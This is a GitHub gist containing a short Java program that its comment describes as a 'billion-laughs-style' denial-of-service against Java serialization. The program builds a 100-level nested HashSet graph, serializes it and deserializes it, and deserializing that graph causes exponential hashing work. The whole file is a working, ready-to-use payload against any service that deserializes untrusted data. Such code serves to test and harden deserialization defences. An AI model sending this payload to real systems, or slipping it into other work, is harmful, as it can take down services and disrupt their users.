| import java.io.ByteArrayInputStream; | |
| import java.io.ByteArrayOutputStream; | |
| import java.io.IOException; | |
| import java.io.ObjectInputStream; | |
| import java.io.ObjectOutputStream; | |
| import java.util.HashSet; | |
| import java.util.Set; | |
| // billion-laughs-style DoS for java serialization | |
| public class SerialDOS { | |
| public static void main(String[] args) throws Exception { | |
| deserialize(payload()); | |
| } | |
| static Object deserialize(byte[] bytes) throws Exception { | |
| return new ObjectInputStream(new ByteArrayInputStream(bytes)).readObject(); | |
| } | |
| static byte[] payload() throws IOException { | |
| Set root = new HashSet(); | |
| Set s1 = root; | |
| Set s2 = new HashSet(); | |
| for (int i = 0; i < 100; i++) { | |
| Set t1 = new HashSet(); | |
| Set t2 = new HashSet(); | |
| t1.add("foo"); // make it not equal to t2 | |
| s1.add(t1); | |
| s1.add(t2); | |
| s2.add(t1); | |
| s2.add(t2); | |
| s1 = t1; | |
| s2 = t2; | |
| } | |
| return serialize(root); | |
| } | |
| static byte[] serialize(Object o) throws IOException { | |
| ByteArrayOutputStream ba = new ByteArrayOutputStream(); | |
| ObjectOutputStream oos = new ObjectOutputStream(ba); | |
| oos.writeObject(o); | |
| oos.close(); | |
| return ba.toByteArray(); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment